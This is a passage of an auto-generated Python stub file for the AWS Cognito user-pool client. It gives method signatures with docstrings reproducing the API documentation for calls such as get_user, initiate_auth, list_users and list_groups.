See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUICustomization>`_
**Request Syntax**
::
response = client.get_ui_customization(
UserPoolId='string',
ClientId='string'
)
**Response Syntax**
::
{
'UICustomization': {
'UserPoolId': 'string',
'ClientId': 'string',
'ImageUrl': 'string',
'CSS': 'string',
'CSSVersion': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **UICustomization** *(dict) --*
The UI customization information.
- **UserPoolId** *(string) --*
The user pool ID for the user pool.
- **ClientId** *(string) --*
The client ID for the client app.
- **ImageUrl** *(string) --*
The logo image for the UI customization.
- **CSS** *(string) --*
The CSS values in the UI customization.
- **CSSVersion** *(string) --*
The CSS version number.
- **LastModifiedDate** *(datetime) --*
The last-modified date for the UI customization.
- **CreationDate** *(datetime) --*
The creation date for the UI customization.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type ClientId: string
:param ClientId:
The client ID for the client app.
:rtype: dict
:returns:
"""
pass
def get_user(self, AccessToken: str) -> Dict:
"""
Gets the user attributes and metadata for a user.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUser>`_
**Request Syntax**
::
response = client.get_user(
AccessToken='string'
)
**Response Syntax**
::
{
'Username': 'string',
'UserAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
],
'PreferredMfaSetting': 'string',
'UserMFASettingList': [
'string',
]
}
**Response Structure**
- *(dict) --*
Represents the response from the server from the request to get information about the user.
- **Username** *(string) --*
The user name of the user you wish to retrieve from the get user request.
- **UserAttributes** *(list) --*
An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **MFAOptions** *(list) --*
Specifies the options for MFA (e.g., email or phone number).
- *(dict) --*
Specifies the different settings for multi-factor authentication (MFA).
- **DeliveryMedium** *(string) --*
The delivery medium (email message or SMS message) to send the MFA code.
- **AttributeName** *(string) --*
The attribute name of the MFA option type.
- **PreferredMfaSetting** *(string) --*
The user's preferred MFA setting.
- **UserMFASettingList** *(list) --*
The list of the user's MFA settings.
- *(string) --*
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token returned by the server response to get information about the user.
:rtype: dict
:returns:
"""
pass
def get_user_attribute_verification_code(self, AccessToken: str, AttributeName: str) -> Dict:
"""
Gets the user attribute verification code for the specified attribute name.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUserAttributeVerificationCode>`_
**Request Syntax**
::
response = client.get_user_attribute_verification_code(
AccessToken='string',
AttributeName='string'
)
**Response Syntax**
::
{
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
}
}
**Response Structure**
- *(dict) --*
The verification code response returned by the server response to get the user attribute verification code.
- **CodeDeliveryDetails** *(dict) --*
The code delivery details returned by the server in response to the request to get the user attribute verification code.
- **Destination** *(string) --*
The destination for the code delivery details.
- **DeliveryMedium** *(string) --*
The delivery medium (email message or phone number).
- **AttributeName** *(string) --*
The attribute name.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token returned by the server response to get the user attribute verification code.
:type AttributeName: string
:param AttributeName: **[REQUIRED]**
The attribute name returned by the server response to get the user attribute verification code.
:rtype: dict
:returns:
"""
pass
def get_user_pool_mfa_config(self, UserPoolId: str) -> Dict:
"""
Gets the user pool multi-factor authentication (MFA) configuration.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetUserPoolMfaConfig>`_
**Request Syntax**
::
response = client.get_user_pool_mfa_config(
UserPoolId='string'
)
**Response Syntax**
::
{
'SmsMfaConfiguration': {
'SmsAuthenticationMessage': 'string',
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
}
},
'SoftwareTokenMfaConfiguration': {
'Enabled': True|False
},
'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL'
}
**Response Structure**
- *(dict) --*
- **SmsMfaConfiguration** *(dict) --*
The SMS text message multi-factor (MFA) configuration.
- **SmsAuthenticationMessage** *(string) --*
The SMS authentication message.
- **SmsConfiguration** *(dict) --*
The SMS configuration.
- **SnsCallerArn** *(string) --*
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
- **SoftwareTokenMfaConfiguration** *(dict) --*
The software token multi-factor (MFA) configuration.
- **Enabled** *(boolean) --*
Specifies whether software token MFA is enabled.
- **MfaConfiguration** *(string) --*
The multi-factor (MFA) configuration.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:rtype: dict
:returns:
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def global_sign_out(self, AccessToken: str) -> Dict:
"""
Signs out users from all devices.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GlobalSignOut>`_
**Request Syntax**
::
response = client.global_sign_out(
AccessToken='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The response to the request to sign out all devices.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token.
:rtype: dict
:returns:
"""
pass
def initiate_auth(self, AuthFlow: str, ClientId: str, AuthParameters: Dict = None, ClientMetadata: Dict = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
"""
Initiates the authentication flow.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/InitiateAuth>`_
**Request Syntax**
::
response = client.initiate_auth(
AuthFlow='USER_SRP_AUTH'|'REFRESH_TOKEN_AUTH'|'REFRESH_TOKEN'|'CUSTOM_AUTH'|'ADMIN_NO_SRP_AUTH'|'USER_PASSWORD_AUTH',
AuthParameters={
'string': 'string'
},
ClientMetadata={
'string': 'string'
},
ClientId='string',
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
},
UserContextData={
'EncodedData': 'string'
}
)
**Response Syntax**
::
{
'ChallengeName': 'SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
**Response Structure**
- *(dict) --*
Initiates the authentication response.
- **ChallengeName** *(string) --*
The name of the challenge which you are responding to with this call. This is returned to you in the ``AdminInitiateAuth`` response if you need to pass another challenge.
Valid values include the following. Note that all of these challenges require ``USERNAME`` and ``SECRET_HASH`` (if applicable) in the parameters.
* ``SMS_MFA`` : Next challenge is to supply an ``SMS_MFA_CODE`` , delivered via SMS.
* ``PASSWORD_VERIFIER`` : Next challenge is to supply ``PASSWORD_CLAIM_SIGNATURE`` , ``PASSWORD_CLAIM_SECRET_BLOCK`` , and ``TIMESTAMP`` after the client-side SRP calculations.
* ``CUSTOM_CHALLENGE`` : This is returned if your custom authentication flow determines that the user should pass another challenge before tokens are issued.
* ``DEVICE_SRP_AUTH`` : If device tracking was enabled on your user pool and the previous challenges were passed, this challenge is returned so that Amazon Cognito can start tracking this device.
* ``DEVICE_PASSWORD_VERIFIER`` : Similar to ``PASSWORD_VERIFIER`` , but for devices only.
* ``NEW_PASSWORD_REQUIRED`` : For users which are required to change their passwords after successful first login. This challenge should be passed with ``NEW_PASSWORD`` and any other required attributes.
- **Session** *(string) --*
The session which should be passed both ways in challenge-response calls to the service. If the or API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next ``RespondToAuthChallenge`` API call.
- **ChallengeParameters** *(dict) --*
The challenge parameters. These are returned to you in the ``InitiateAuth`` response if you need to pass another challenge. The responses in this parameter should be used to compute inputs to the next call (``RespondToAuthChallenge`` ).
All challenges require ``USERNAME`` and ``SECRET_HASH`` (if applicable).
- *(string) --*
- *(string) --*
- **AuthenticationResult** *(dict) --*
The result of the authentication response. This is only returned if the caller does not need to pass another challenge. If the caller does need to pass another challenge before it gets tokens, ``ChallengeName`` , ``ChallengeParameters`` , and ``Session`` are returned.
- **AccessToken** *(string) --*
The access token.
- **ExpiresIn** *(integer) --*
The expiration period of the authentication result in seconds.
- **TokenType** *(string) --*
The token type.
- **RefreshToken** *(string) --*
The refresh token.
- **IdToken** *(string) --*
The ID token.
- **NewDeviceMetadata** *(dict) --*
The new device metadata from an authentication result.
- **DeviceKey** *(string) --*
The device key.
- **DeviceGroupKey** *(string) --*
The device group key.
:type AuthFlow: string
:param AuthFlow: **[REQUIRED]**
The authentication flow for this call to execute. The API action will depend on this value. For example:
* ``REFRESH_TOKEN_AUTH`` will take in a valid refresh token and return new tokens.
* ``USER_SRP_AUTH`` will take in ``USERNAME`` and ``SRP_A`` and return the SRP variables to be used for next challenge execution.
* ``USER_PASSWORD_AUTH`` will take in ``USERNAME`` and ``PASSWORD`` and return the next challenge or tokens.
Valid values include:
* ``USER_SRP_AUTH`` : Authentication flow for the Secure Remote Password (SRP) protocol.
* ``REFRESH_TOKEN_AUTH`` /``REFRESH_TOKEN`` : Authentication flow for refreshing the access token and ID token by supplying a valid refresh token.
* ``CUSTOM_AUTH`` : Custom authentication flow.
* ``USER_PASSWORD_AUTH`` : Non-SRP authentication flow; USERNAME and PASSWORD are passed directly. If a user migration Lambda trigger is set, this flow will invoke the user migration Lambda if the USERNAME is not found in the user pool.
``ADMIN_NO_SRP_AUTH`` is not a valid value.
:type AuthParameters: dict
:param AuthParameters:
The authentication parameters. These are inputs corresponding to the ``AuthFlow`` that you are invoking. The required values depend on the value of ``AuthFlow`` :
* For ``USER_SRP_AUTH`` : ``USERNAME`` (required), ``SRP_A`` (required), ``SECRET_HASH`` (required if the app client is configured with a client secret), ``DEVICE_KEY``
* For ``REFRESH_TOKEN_AUTH/REFRESH_TOKEN`` : ``REFRESH_TOKEN`` (required), ``SECRET_HASH`` (required if the app client is configured with a client secret), ``DEVICE_KEY``
* For ``CUSTOM_AUTH`` : ``USERNAME`` (required), ``SECRET_HASH`` (if app client is configured with client secret), ``DEVICE_KEY``
- *(string) --*
- *(string) --*
:type ClientMetadata: dict
:param ClientMetadata:
This is a random key-value pair map which can contain any key and will be passed to your PreAuthentication Lambda trigger as-is. It can be used to implement additional validations around authentication.
- *(string) --*
- *(string) --*
:type ClientId: string
:param ClientId: **[REQUIRED]**
The app client ID.
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The Amazon Pinpoint analytics metadata for collecting metrics for ``InitiateAuth`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:type UserContextData: dict
:param UserContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **EncodedData** *(string) --*
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
:rtype: dict
:returns:
"""
pass
def list_devices(self, AccessToken: str, Limit: int = None, PaginationToken: str = None) -> Dict:
"""
Lists the devices.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListDevices>`_
**Request Syntax**
::
response = client.list_devices(
AccessToken='string',
Limit=123,
PaginationToken='string'
)
**Response Syntax**
::
{
'Devices': [
{
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
},
],
'PaginationToken': 'string'
}
**Response Structure**
- *(dict) --*
Represents the response to list devices.
- **Devices** *(list) --*
The devices returned in the list devices response.
- *(dict) --*
The device type.
- **DeviceKey** *(string) --*
The device key.
- **DeviceAttributes** *(list) --*
The device attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **DeviceCreateDate** *(datetime) --*
The creation date of the device.
- **DeviceLastModifiedDate** *(datetime) --*
The last modified date of the device.
- **DeviceLastAuthenticatedDate** *(datetime) --*
The date in which the device was last authenticated.
- **PaginationToken** *(string) --*
The pagination token for the list device response.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access tokens for the request to list devices.
:type Limit: integer
:param Limit:
The limit of the device request.
:type PaginationToken: string
:param PaginationToken:
The pagination token for the list request.
:rtype: dict
:returns:
"""
pass
def list_groups(self, UserPoolId: str, Limit: int = None, NextToken: str = None) -> Dict:
"""
Lists the groups associated with a user pool.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListGroups>`_
**Request Syntax**
::
response = client.list_groups(
UserPoolId='string',
Limit=123,
NextToken='string'
)
**Response Syntax**
::
{
'Groups': [
{
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **Groups** *(list) --*
The group objects for the groups.
- *(dict) --*
The group type.
- **GroupName** *(string) --*
The name of the group.
- **UserPoolId** *(string) --*
The user pool ID for the user pool.
- **Description** *(string) --*
A string containing the description of the group.
- **RoleArn** *(string) --*
The role ARN for the group.
- **Precedence** *(integer) --*
A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. If a user belongs to two or more groups, it is the group with the highest precedence whose role ARN will be used in the ``cognito:roles`` and ``cognito:preferred_role`` claims in the user's tokens. Groups with higher ``Precedence`` values take precedence over groups with lower ``Precedence`` values or with null ``Precedence`` values.
Two groups can have the same ``Precedence`` value. If this happens, neither group takes precedence over the other. If two groups with the same ``Precedence`` have the same role ARN, that role is used in the ``cognito:preferred_role`` claim in tokens for users in each group. If the two groups have different role ARNs, the ``cognito:preferred_role`` claim is not set in users' tokens.
The default ``Precedence`` value is null.
- **LastModifiedDate** *(datetime) --*
The date the group was last modified.
- **CreationDate** *(datetime) --*
The date the group was created.
- **NextToken** *(string) --*
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Limit: integer
:param Limit:
The limit of the request to list groups.
:type NextToken: string
:param NextToken:
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:returns:
"""
pass
def list_identity_providers(self, UserPoolId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists information about all identity providers for a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListIdentityProviders>`_
**Request Syntax**
::
response = client.list_identity_providers(
UserPoolId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'Providers': [
{
'ProviderName': 'string',
'ProviderType': 'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **Providers** *(list) --*
A list of identity provider objects.
- *(dict) --*
A container for identity provider details.
- **ProviderName** *(string) --*
The identity provider name.
- **ProviderType** *(string) --*
The identity provider type.
- **LastModifiedDate** *(datetime) --*
The date the provider was last modified.
- **CreationDate** *(datetime) --*
The date the provider was added to the user pool.
- **NextToken** *(string) --*
A pagination token.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type MaxResults: integer
:param MaxResults:
The maximum number of identity providers to return.
:type NextToken: string
:param NextToken:
A pagination token.
:rtype: dict
:returns:
"""
pass
def list_resource_servers(self, UserPoolId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists the resource servers for a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListResourceServers>`_
**Request Syntax**
::
response = client.list_resource_servers(
UserPoolId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ResourceServers': [
{
'UserPoolId': 'string',
'Identifier': 'string',
'Name': 'string',
'Scopes': [
{
'ScopeName': 'string',
'ScopeDescription': 'string'
},
]
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ResourceServers** *(list) --*
The resource servers.
- *(dict) --*
A container for information about a resource server for a user pool.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that hosts the resource server.
- **Identifier** *(string) --*
The identifier for the resource server.
- **Name** *(string) --*
The name of the resource server.
- **Scopes** *(list) --*
A list of scopes that are defined for the resource server.
- *(dict) --*
A resource server scope.
- **ScopeName** *(string) --*
The name of the scope.
- **ScopeDescription** *(string) --*
A description of the scope.
- **NextToken** *(string) --*
A pagination token.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type MaxResults: integer
:param MaxResults:
The maximum number of resource servers to return.
:type NextToken: string
:param NextToken:
A pagination token.
:rtype: dict
:returns:
"""
pass
def list_tags_for_resource(self, ResourceArn: str) -> Dict:
"""
Lists the tags that are assigned to an Amazon Cognito user pool.
A tag is a label that you can apply to user pools to categorize and manage them in different ways, such as by purpose, owner, environment, or other criteria.
You can use this action up to 10 times per second, per account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListTagsForResource>`_
**Request Syntax**
::
response = client.list_tags_for_resource(
ResourceArn='string'
)
**Response Syntax**
::
{
'Tags': {
'string': 'string'
}
}
**Response Structure**
- *(dict) --*
- **Tags** *(dict) --*
The tags that are assigned to the user pool.
- *(string) --*
- *(string) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the user pool that the tags are assigned to.
:rtype: dict
:returns:
"""
pass
def list_user_import_jobs(self, UserPoolId: str, MaxResults: int, PaginationToken: str = None) -> Dict:
"""
Lists the user import jobs.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUserImportJobs>`_
**Request Syntax**
::
response = client.list_user_import_jobs(
UserPoolId='string',
MaxResults=123,
PaginationToken='string'
)
**Response Syntax**
::
{
'UserImportJobs': [
{
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
},
],
'PaginationToken': 'string'
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to list the user import jobs.
- **UserImportJobs** *(list) --*
The user import jobs.
- *(dict) --*
The user import job type.
- **JobName** *(string) --*
The job name for the user import job.
- **JobId** *(string) --*
The job ID for the user import job.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that the users are being imported into.
- **PreSignedUrl** *(string) --*
The pre-signed URL to be used to upload the ``.csv`` file.
- **CreationDate** *(datetime) --*
The date the user import job was created.
- **StartDate** *(datetime) --*
The date when the user import job was started.
- **CompletionDate** *(datetime) --*
The date when the user import job was completed.
- **Status** *(string) --*
The status of the user import job. One of the following:
* ``Created`` - The job was created but not started.
* ``Pending`` - A transition state. You have started the job, but it has not begun importing users yet.
* ``InProgress`` - The job has started, and users are being imported.
* ``Stopping`` - You have stopped the job, but the job has not stopped importing users yet.
* ``Stopped`` - You have stopped the job, and the job has stopped importing users.
* ``Succeeded`` - The job has completed successfully.
* ``Failed`` - The job has stopped due to an error.
* ``Expired`` - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
- **CloudWatchLogsRoleArn** *(string) --*
The role ARN for the Amazon CloudWatch Logging role for the user import job. For more information, see "Creating the CloudWatch Logs IAM Role" in the Amazon Cognito Developer Guide.
- **ImportedUsers** *(integer) --*
The number of users that were successfully imported.
- **SkippedUsers** *(integer) --*
The number of users that were skipped.
- **FailedUsers** *(integer) --*
The number of users that could not be imported.
- **CompletionMessage** *(string) --*
The message returned when the user import job is completed.
- **PaginationToken** *(string) --*
An identifier that can be used to return the next set of user import jobs in the list.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that the users are being imported into.
:type MaxResults: integer
:param MaxResults: **[REQUIRED]**
The maximum number of import jobs you want the request to return.
:type PaginationToken: string
:param PaginationToken:
An identifier that was returned from the previous call to ``ListUserImportJobs`` , which can be used to return the next set of import jobs in the list.
:rtype: dict
:returns:
"""
pass
def list_user_pool_clients(self, UserPoolId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists the clients that have been created for the specified user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUserPoolClients>`_
**Request Syntax**
::
response = client.list_user_pool_clients(
UserPoolId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'UserPoolClients': [
{
'ClientId': 'string',
'UserPoolId': 'string',
'ClientName': 'string'
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Represents the response from the server that lists user pool clients.
- **UserPoolClients** *(list) --*
The user pool clients in the response that lists user pool clients.
- *(dict) --*
The description of the user pool client.
- **ClientId** *(string) --*
The ID of the client associated with the user pool.
- **UserPoolId** *(string) --*
The user pool ID for the user pool where you want to describe the user pool client.
- **ClientName** *(string) --*
The client name from the user pool client description.
- **NextToken** *(string) --*
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to list user pool clients.
:type MaxResults: integer
:param MaxResults:
The maximum number of results you want the request to return when listing the user pool clients.
:type NextToken: string
:param NextToken:
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:returns:
"""
pass
def list_user_pools(self, MaxResults: int, NextToken: str = None) -> Dict:
"""
Lists the user pools associated with an AWS account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUserPools>`_
**Request Syntax**
::
response = client.list_user_pools(
NextToken='string',
MaxResults=123
)
**Response Syntax**
::
{
'UserPools': [
{
'Id': 'string',
'Name': 'string',
'LambdaConfig': {
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
'Status': 'Enabled'|'Disabled',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Represents the response to list user pools.
- **UserPools** *(list) --*
The user pools from the response to list users.
- *(dict) --*
A user pool description.
- **Id** *(string) --*
The ID in a user pool description.
- **Name** *(string) --*
The name in a user pool description.
- **LambdaConfig** *(dict) --*
The AWS Lambda configuration information in a user pool description.
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
- **Status** *(string) --*
The user pool status in a user pool description.
- **LastModifiedDate** *(datetime) --*
The date the user pool description was last modified.
- **CreationDate** *(datetime) --*
The date the user pool description was created.
- **NextToken** *(string) --*
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type NextToken: string
:param NextToken:
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type MaxResults: integer
:param MaxResults: **[REQUIRED]**
The maximum number of results you want the request to return when listing the user pools.
:rtype: dict
:returns:
"""
pass
def list_users(self, UserPoolId: str, AttributesToGet: List = None, Limit: int = None, PaginationToken: str = None, Filter: str = None) -> Dict:
"""
Lists the users in the Amazon Cognito user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUsers>`_
**Request Syntax**
::
response = client.list_users(
UserPoolId='string',
AttributesToGet=[
'string',
],
Limit=123,
PaginationToken='string',
Filter='string'
)
**Response Syntax**
::
{
'Users': [
{
'Username': 'string',
'Attributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
},
],
'PaginationToken': 'string'
}
**Response Structure**
- *(dict) --*
The response from the request to list users.
- **Users** *(list) --*
The users returned in the request to list users.
- *(dict) --*
The user type.
- **Username** *(string) --*
The user name of the user you wish to describe.
- **Attributes** *(list) --*
A container with information about the user type attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **UserCreateDate** *(datetime) --*
The creation date of the user.
- **UserLastModifiedDate** *(datetime) --*
The last modified date of the user.
- **Enabled** *(boolean) --*
Specifies whether the user is enabled.
- **UserStatus** *(string) --*
The user status. Can be one of the following:
* UNCONFIRMED - User has been created but not confirmed.
* CONFIRMED - User has been confirmed.
* ARCHIVED - User is no longer active.
* COMPROMISED - User is disabled due to a potential security threat.
* UNKNOWN - User status is not known.
* RESET_REQUIRED - User is confirmed, but the user must request a code and reset his or her password before he or she can sign in.
* FORCE_CHANGE_PASSWORD - The user is confirmed and the user can sign in using a temporary password, but on first sign-in, the user must change his or her password to a new value before doing anything else.
- **MFAOptions** *(list) --*
The MFA options for the user.
- *(dict) --*
Specifies the different settings for multi-factor authentication (MFA).
- **DeliveryMedium** *(string) --*
The delivery medium (email message or SMS message) to send the MFA code.
- **AttributeName** *(string) --*
The attribute name of the MFA option type.
- **PaginationToken** *(string) --*
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool on which the search should be performed.
:type AttributesToGet: list
:param AttributesToGet:
An array of strings, where each string is the name of a user attribute to be returned for each user in the search results. If the array is null, all attributes are returned.
- *(string) --*
:type Limit: integer
:param Limit:
Maximum number of users to be returned.
:type PaginationToken: string
:param PaginationToken:
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type Filter: string
:param Filter:
A filter string of the form \"*AttributeName* *Filter-Type* \"*AttributeValue* \"\". Quotation marks within the filter string must be escaped using the backslash (\) character. For example, \"``family_name`` = \\"Reddy\\"\".
* *AttributeName* : The name of the attribute to search for. You can only search for one attribute at a time.
* *Filter-Type* : For an exact match, use =, for example, \"``given_name`` = \\"Jon\\"\". For a prefix (\"starts with\") match, use ^=, for example, \"``given_name`` ^= \\"Jon\\"\".
* *AttributeValue* : The attribute value that must be matched for each user.
If the filter string is empty, ``ListUsers`` returns all users in the user pool.
You can only search for the following standard attributes:
* ``username`` (case-sensitive)
* ``email``
* ``phone_number``
* ``name``
* ``given_name``
* ``family_name``
* ``preferred_username``
* ``cognito:user_status`` (called **Status** in the Console) (case-insensitive)
* ``status (called **Enabled** in the Console) (case-sensitive)``
* ``sub``
Custom attributes are not searchable.
For more information, see `Searching for Users Using the ListUsers API <http://docs.aws.amazon.com/cognito/latest/developerguide/how-to-manage-user-accounts.html#cognito-user-pools-searching-for-users-using-listusers-api>`__ and `Examples of Using the ListUsers API <http://docs.aws.amazon.com/cognito/latest/developerguide/how-to-manage-user-accounts.html#cognito-user-pools-searching-for-users-listusers-api-examples>`__ in the *Amazon Cognito Developer Guide* .
:rtype: dict
:returns:
"""
pass
def list_users_in_group(self, UserPoolId: str, GroupName: str, Limit: int = None, NextToken: str = None) -> Dict:
"""
Lists the users in the specified group.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUsersInGroup>`_
**Request Syntax**
